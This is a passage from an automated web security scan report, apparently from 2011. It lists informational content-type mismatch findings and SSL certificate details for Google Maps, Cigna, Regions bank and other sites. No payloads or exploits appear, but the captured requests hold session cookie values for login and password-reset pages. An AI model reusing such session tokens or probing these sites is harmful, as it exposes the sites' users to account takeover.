Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.placelocal.com%2F&callback=_xdc_._4yo50g&token=45097 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 16 May 2011 16:15:36 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._4yo50g && _xdc_._4yo50g( [1] )
22.5. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d42.298510953956395&2d-71.34532860534671&2m2&1d42.41876265372929&2d-70.76803139465335&2u13&4sen-US&5e0&callback=_xdc_._7hwynl&token=51217 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 16 May 2011 16:15:39 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2789

_xdc_._7hwynl && _xdc_._7hwynl( ["Map data ..2011 Google",[["street_view",[[42.40723466155187,-71.3671875],[42.42345651793831,-70.9716796875]]],["street_view",[[42.40723466155187,-70.94970703125],[42.
...[SNIP]...
22.6. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/openhand_8_8.cur HTTP/1.1
Host: maps.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Mon, 16 May 2011 16:15:36 GMT
Expires: Mon, 16 May 2011 16:15:36 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@...............................................................................................................................?...w...g...............................
...[SNIP]...
22.7. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:05 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
22.8. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/makeRequest

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /gadgets/makeRequest?refresh=3600&url=http%3A%2F%2Ffcgadgets.appspot.com%2Fs%2Ff%3Fn%3D0.5991967397276312%26pageurl%3Dhttp%3A%2F%2Fwww.cloudscan.me%2Fp%2Fenterprise-exploit-coverage-by-hoyt-llc.html&httpMethod=GET&headers=&postData=&authz=&st=&contentType=DOM&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1305556363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.1517248625.1305556363.1305556363.1305556363.1; __utmc=209791819; __utmb=209791819.1.10.1305556363

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 15:32:44 GMT
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Mon, 16 May 2011 14:32:44 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public,max-age=3600
Age: 1
Content-Length: 379

throw 1; < don't be evil' >{"http://fcgadgets.appspot.com/s/f?n=0.5991967397276312&pageurl=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html":{"body":"\u003c?xml version=\"1.0\" e
...[SNIP]...
22.9. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTHID=73F9C9687FD1107FC7C5A536181C0CE6; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:41 GMT
Content-length: 2621
Content-type: text/css
Set-Cookie: TLTHID=756B01F47FD1107FC7E5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "4ceaf758-1-0-a3d"
Last-modified: Wed, 21 Jan 2004 14:36:30 GMT
Accept-ranges: bytes

<style>
   
   body {
   background-color : #FFFFFF;
   }
   
   P, TD, UL {
   font-family: "Arial", "Helvetica", sans-serif;
   font-size: 9pt;
   color: #000000;
   font-style: normal;        
   }

   .body {

...[SNIP]...
22.10. http://www.frontrowusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.frontrowusa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.1.10.1305559365

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 15:22:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10

Not found!
22.11. http://www.paperg.com/jsfb/embed.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:47:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 49236


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
22.12. http://www.placelocal.com/api.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.placelocal.com
Path:   /api.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api.php?request=user.forgotPassword&email=&format=json&cache=0.8891735644657254 HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305558942.1; __utmb=94208860.1.10.1305558942; __utmc=94208860; __utmz=94208860.1305558942.1.1.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:41:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:41:34 GMT
Vary: Accept-Encoding
Content-Length: 71

[false,"Sorry, we could not find this email address in our system.",[]]
22.13. http://xsinternational.app6.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://xsinternational.app6.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: xsinternational.app6.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.xsnet.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=QPwMRr0yzQEkAAAAMTU2ZDI3OTQtNDczYi00ZDAzLWIxMmItM2UzODNhZTI0NThl0; expires=Tue, 15-May-2012 17:07:56 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=86af4891-a613-46df-8156-05a4fd7b2019; domain=xsinternational.app6.hubspot.com; expires=Sun, 16-May-2021 05:00:00 GMT; path=/; HttpOnly
Date: Mon, 16 May 2011 17:07:56 GMT
Set-Cookie: HUBSPOT39=252777644.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 39123;
var hsWeekEndsIn = 557523;
var hsMonthEndsIn = 1335123;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-16 13:07
...[SNIP]...
23. SSL certificate  previous
There are 11 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

23.1. https://cignaforhcp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cignaforhcp.cigna.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jan 24 18:00:00 CST 2011
Valid to:  Wed Jan 25 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036
23.2. https://my.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  my.cigna.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jan 25 18:00:00 CST 2011
Valid to:  Thu Jan 26 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
23.3. https://secure.regionsmortgage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.regionsmortgage.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Feb 01 18:00:00 CST 2011
Valid to:  Thu Feb 02 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
23.4. https://secureapps.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secureapps.regions.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed May 04 19:00:00 CDT 2011
Valid to:  Sat May 05 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
23.5. https://securebank.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  securebank.regions.com
Issued by:  VeriSign Class 3 Secure OFX CA - G3
Valid from:  Wed Feb 02 18:00:00 CST 2011
Valid to:  Fri Feb 03 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure OFX CA - G3
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 31 19:00:00 CDT 2009
Valid to:  Sun Mar 31 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
23.6. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  sso.corp.cigna.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Mar 23 19:00:00 CDT 2011
Valid to:  Fri Mar 23 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
23.7. https://www.frontrowusa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.frontrowusa.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Fri Jun 19 11:26:34 CDT 2009
Valid to:  Sun Jun 19 11:26:34 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
23.8. https://www.paperg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.paperg.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Nov 30 15:10:42 CST 2010
Valid to:  Fri Dec 09 17:31:16 CST 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
23.9. https://www.planservices.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.planservices.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.planservices.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Nov 28 18:00:00 CST 2010
Valid to:  Tue Nov 29 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
23.10. https://www.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.regions.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Jun 02 19:00:00 CDT 2010
Valid to:  Wed Jun 15 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
23.11. https://wwwa.applyonlinenow.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wwwa.applyonlinenow.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wwwa.applyonlinenow.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Sep 01 19:00:00 CDT 2010
Valid to:  Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028
Report generated byXSS.CX at Mon May 16 17:32:49 CDT 2011.